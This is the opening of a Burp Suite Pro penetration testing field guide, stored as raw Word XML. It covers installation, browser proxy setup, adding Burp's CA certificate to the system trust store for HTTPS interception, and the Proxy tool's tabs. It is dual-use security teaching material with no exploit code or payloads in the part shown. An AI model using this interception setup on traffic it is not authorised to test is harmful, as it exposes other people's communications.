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p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">BURP SUITE PRO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="00A6FF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Penetration Testing Field Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7B94B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Beginner to Professional — OWASP Top 10 · CVE/CWE/CVSS · Report Writing · Case Studies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A0A0F" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF2D55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  ⚠  FOR AUTHORISED PENETRATION TESTING ENGAGEMENTS ONLY  ⚠  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7B94B5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: Vedant Sareen  ·  Cybersecurity Researcher  ·  2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 1: INTRODUCTION TO BURP SUITE PRO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite Professional by PortSwigger is the industry-standard web application security testing platform used by penetration testers, bug bounty hunters, and red team operators worldwide. It operates as an intercepting proxy sitting between your browser and the target web application, giving you complete visibility and control over every HTTP/S request and response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This guide takes you from first launch to conducting professional-grade web application penetration tests. You will learn every tool inside Burp Suite Pro, how to exploit the OWASP Top 10 vulnerabilities, how to interpret CVEs, CWEs, and CVSS scores, how to write professional pentest reports, and how to map your findings to real-world case studies.</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1.1  What Burp Suite Pro Gives You Over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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Burp Scanner (Active)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Automated vulnerability scanner — finds SQLi, XSS, XXE, SSRF, and 100+ more</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Burp Scanner (Passive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Passively detects issues in all proxied traffic without sending extra requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Burp Collaborator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Out-of-band detection for blind SQLi, SSRF, XXE, RCE via DNS/HTTP callbacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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BApp Store Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Full access to all professional extensions (SQLiPy, Autorize, JWT Editor, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Intruder — No Throttle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Community throttles Intruder to 1 req/sec; Pro has unlimited speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Saved State Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Save and restore entire project state including history and scan results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Advanced Scan Configs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Granular scan configurations, crawl limits, insertion points, false positive tuning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Report Generator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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One-click HTML/XML pentest reports with CVSS-scored findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1.2  Installation &amp; Initial Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ System Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java 11+ (JDK recommended) — Burp ships with an embedded JRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimum 8 GB RAM (16 GB recommended for large scans)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: Windows 10/11, Kali Linux, Ubuntu 20.04+, macOS 12+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Install on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  sudo apt-get update &amp;&amp; sudo apt-get install burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="060F1C" w:val="clear"/>
        <w:spacing w:before="30" w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FDBFF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  burpsuite &amp;  # launch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Install from PortSwigger (Pro)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Download installer from https://portswigger.net/burp/releases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run: sh burpsuite_pro_linux_&lt;version&gt;.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate your license key on first launch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Configuring Your Browser Proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite listens on 127.0.0.1:8080 by default. Configure your browser to use this proxy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox: Settings → Network → Manual proxy → HTTP: 127.0.0.1, Port: 8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chrome: Use FoxyProxy extension or launch with --proxy-server=127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommended: Use Burp's built-in Chromium browser (Proxy tab → Open Browser)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Installing Burp CA Certificate (HTTPS Interception)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse to http://burp while proxy is active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Download the CA certificate (cacert.der)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox: Preferences → Privacy → Certificates → Import</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="50" w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">System-wide (Kali): sudo cp cacert.der /usr/local/share/ca-certificates/burp.crt &amp;&amp; sudo update-ca-certificates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">SECTION 2: BURP SUITE TOOLS — COMPLETE REFERENCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B6EFF" w:sz="3" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C42"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.1  Proxy — The Core Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Proxy is the foundation of every Burp Suite workflow. All traffic between your browser and the target passes through it, giving you the ability to intercept, inspect, modify, and replay any request or response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Intercept Tab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Toggle intercept ON/OFF — when ON every request pauses awaiting your action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward: send request as-is to the server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Drop: discard the request entirely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Action menu: Send to Repeater, Intruder, Scanner, Decoder, Comparer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-click any parameter: 'Send to Intruder' for fuzzing workflows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ HTTP History Tab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete log of every proxied request/response pair</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter by host, method, response code, MIME type, or search term</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Colour-code requests by type, status, or manually for organisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C8D8F0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Right-click any request to send it to any Burp tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFD166"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Proxy Options — Critical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Option</w:t>
